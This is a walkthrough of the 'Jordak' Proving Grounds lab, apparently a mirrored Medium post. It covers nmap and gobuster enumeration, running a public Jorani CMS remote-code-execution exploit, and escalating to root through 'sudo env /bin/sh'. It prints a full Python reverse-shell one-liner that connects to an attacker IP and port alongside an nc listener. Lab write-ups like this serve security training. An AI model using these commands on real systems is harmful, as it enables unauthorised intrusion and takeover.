Jordak Linux Lab Proving Grounds

Jordak Linux Lab Proving Grounds | by Cyb0rgBytes | in InfoSec Write-ups - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Jordak Linux Lab Proving Grounds Moving forward, the first step in a red team pentest is the following: Cyb0rgBytes Follow InfoSec Write-ups · ~4 min read · March 23, 2026 (Updated: March 23, 2026) · Free: Yes AI Generated ( Sora/GPT ) Whenever we are in a pentest, there is things we have to take into consideration while infiltrating a machine or exploiting it's services. there is also different entry points to the target whether it's a misconfigured access control or a vulnerabilty of some sort. Information gathering, by that I'll leverage the tools to gather as much information about the target as possible to later use those info to get access on the system. Always when we want to see if the target is up and running we send ICMP Requests to see if it's live and online: Next I'll run a quick scan with nmap : └─# nmap -sC -sV 192.168.122.109 -oA initial -v Next I'll run a full scan with nmap : └─# nmap -p- -sC -sV 192.168.122.109 -oA full -v Afterwards I'll run a enumeration scan to find web directories that could help us to further explore the target: `└─# gobuster dir -u http://192.168.122.109 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --exclude-length 0 -o enum.txt` from the nmap scan I found the following directory: /evox/about from navigating to the webpage I found the following page: Leave Management system: on the bottom right corner there is a version number for the jorani CMS : after some researching online I found the following exploit for the vulnerability : https://pentest-tools.com/vulnerabilities-exploits/jorani-100-remote-code-execution_1842 CVE-repository/PoCs/CVE_Jorani.py at master · Orange-Cyberdefense/CVE-repository beetle: Repository of CVE found by OCD people. Contribute to Orange-Cyberdefense/CVE-repository development by creating… github.com Running the exploit against the target got me initial access: I noticed while I was examining the target's shell that the environment is running Pseudo-term, the next move will be to stabilize the shell so I can execute commands freely, first I would run a listener in another terminal: nc -lnvp 9001 Afterwards I'll run this command with python to get a better reverse shell: python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' And there we go a shell was recieved: Next I'll run sudo -l to see if there is any possible PE vector with sudo : Apparently I can run /usr/bin/env as Sudo without password, this might be a strong sign that I can escalate privileges with env, next I'll navigate to gtfobins and check if there is any executions i can run with env: by running sudo env /bin/sh I can successfully get root access on the box!!! voila :) Thank you all for reading my writeups and supporting my content till now, I appreciate everyone of you, currently I'm between jobs and preparing for OSCP slowly for the long term, for a better career and for a better future! if you like my content and would like to follow this inspiring journey please clap my content as much as possible, follow me and share my articles if you like them, it really means alot and keeps pushing me further to greatness. Happy hacking! #cybersecurity #hacking #pentesting #ctf-walkthrough #infosec Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).